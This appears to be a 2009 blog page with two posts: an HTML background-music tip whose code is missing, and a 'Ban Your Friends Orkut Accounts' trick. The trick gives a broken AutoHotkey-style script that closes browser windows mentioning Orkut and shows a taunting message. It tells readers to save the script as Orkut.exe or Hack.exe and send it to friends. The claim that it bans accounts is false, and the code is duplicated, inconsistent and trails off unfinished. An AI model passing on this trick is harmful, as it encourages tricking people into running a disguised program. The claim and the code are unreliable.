Showing posts with label code. Show all posts
Showing posts with label code. Show all posts

Friday, April 24, 2009

HTML Tricks-Add a Background Music In Your Web Page

HTML is a basic language and is most commonly used to build web pages and widgeted templates.But many of us how to add a background music to a HTML web page.I got a simple HTML code that will help you in adding a background music file to your web page.

With the help of EMBED command,you can add a background music file.Just add the following code to your HTML document:-


In the above code,replace the king.wav file with your music file and enjoy adding background music to your web pages.


             ***********************
Subscribe the the Learning Scope RSS Feed

Saturday, April 18, 2009

Ban Your Friends Orkut Accounts

Orkut is very famous social networking site where you add new friends,chat with them,create different communities and forums and polls.But if you want to ban others account,then  i got a special trick for you!!This trick will help you to ban your friends orkut account.For this trick,you need to copy-paste a code into Notepad.So follow the method given below:-

1. Open Notepad and type the following code:-

ifwinactive ahk_class IFrame
{
ControlGetText,ed,edit1,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit2,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit2,ahk_class IFrame
ifinstring,ed,orkut
{
winclose ahk_class IFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED you fool`??`r`r MUHAHAHA!!,30
return
}

ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{.......}
}

2.Now save it as Orkut.exe
3.You can replace Orkut with any name like Hack.exe
4.Now send to all your friends.
5.If your friend clicks it,then he/she will be banned.

NOTE:-This trick is for educational purposes only and i will not be responsible for the misuse or illegal use.

                        *******************
         Subscribe to the Learning Scope RSS Feed